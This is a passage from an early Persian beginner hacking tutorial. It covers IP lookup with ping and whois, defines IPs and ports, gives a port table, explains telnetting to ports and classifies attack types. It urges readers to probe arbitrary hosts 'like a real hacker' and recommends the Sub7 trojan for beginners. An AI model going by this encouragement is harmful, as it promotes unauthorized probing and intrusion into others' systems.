Approximate round trip times in milli-seconds:
Minimum = 811ms, Maximum = 822ms, Average = 818ms
ملاحظه می‌فرماييد که ip سازين 63.148.227.65 است.
اگر دستور ping را به‌جای sazin.com برای www.sazin.com صادر کنيد، جواب همان است. البته برای سايت‌های بزرگ جواب‌های حاصل متفاوت خواهد بود.

۳- روش بعدی و کامل‌ترين روش whois کردن به بعضی سايت‌های خاص است. بعدا اين را کامل‌تر توضيح می‌دم ولی فعلا روشش رو می‌گم. آدرس زير را در مرورگر خود تايپ کنيد:
http://www.samspade.org/t/ipwhois?a=xxxxxx
که به‌جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد:
http://www.samspade.org/t/ipwhois?a=sazin.com
http://www.samspade.org/t/ipwhois?a=www.sazin.com
چيزی که در صفحه ظاهر می‌شود به صورت زير است:
whois -h magic 63.148.227.65
sazin.com resolves to 63.148.227.65

Trying whois -h whois.arin.net 63.148.227.65
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
63.148.224.0 - 63.148.231.255

# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN"s Whois database.
که آدرس ip در سطر اول و دوم ذکر شده است.

اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می‌بينيم:
--> روش ping :
www.yahoo.com ====> 64.58.76.229
yahoo.com ====> 66.218.71.198
--> روش whois :
...و www.yahoo.com ====> 66.218.71.86
64.58.79.230 و yahoo.com ====> 66.218.71.198

نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم.

درس شماره 2

- خلاصه درس: با تعريف IP و Port و کاربرد telnet آشنا می‌شويد. انواع حملات را تقسيم‌بندی می‌کنيم.

◊ معرفی چند اصطلاح

IP :
شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود.
اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود:
xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل www.yahoo.com که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد.
در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد.
بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم)

پورت (Port):
در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است.
در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد:
Port Num Service Why its phun
-------- ------- ----------------------------------------
7 echo Host repearts what you type
9 discard Dev/null
11 systat Lots of info on users
13 daytime Time and date at computers location
15 netstat Tremendous info on networks
19 chargen Pours out a stream of ASCII characters.
21 ftp Transfers files
23 telnet Where you log in.
25 smpt Forge email
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login
who Remote who and uptime
514 shell Remote command, no password used
syslog Remote system logging
520 route Routing information protocol


از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.


◊ چگونه به يک پورت Telnet کنيم؟

برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم www.iums.ac.ir مي‌نويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد (-;


◊ تقسيم‌بندی انواع حملات

اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation

در مورد هرکدام به‌زودی توضيح می‌دم. C,Linux,TCP/IP يادتون نره

درس شماره ۱

- خلاصه درس: چند نکته اوليه را بررسی می‌کنيم. از جمله تعريف هک و کارهايی که همزمان با خواندن اين آموزش‌ها بايد انجام دهيد.


◊ ترمينولوژی (اصطلاح‌شناسی)

- Hacker کيست ؟
هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است )

- سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟